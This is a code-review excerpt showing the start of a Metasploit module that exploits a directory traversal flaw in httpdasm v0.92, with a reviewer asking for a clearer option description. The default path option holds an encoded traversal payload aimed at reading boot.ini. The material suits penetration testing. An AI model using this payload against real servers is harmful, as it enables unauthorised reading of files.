modules/auxiliary/scanner/http/httpdasm_directory_traversal.rb

```diff
@@ -0,0 +1,49 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Httpdasm Directory Traversal',
+      'Description'    => %q{
+        Exploits a directory traversal vulnerability to read files from server running httpdasm v0.92.
+      },
+      'Author'         =>
+        [
+          'John Leitch', # EDB POC
+          'Shelby Pace' # Metasploit Module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['EDB', '15861']
+        ]
+    ))
+
+    register_options(
+    [
+      OptString.new('TARGETURI', [true, 'Default path', '%2e%2e%5c' * 8 + 'boot.ini'])
```

Comment:
Might want to change the description to suggest a traversal.

Reply:
Sorry, I meant this option description. `Default path` doesn't suggest a traversal specification.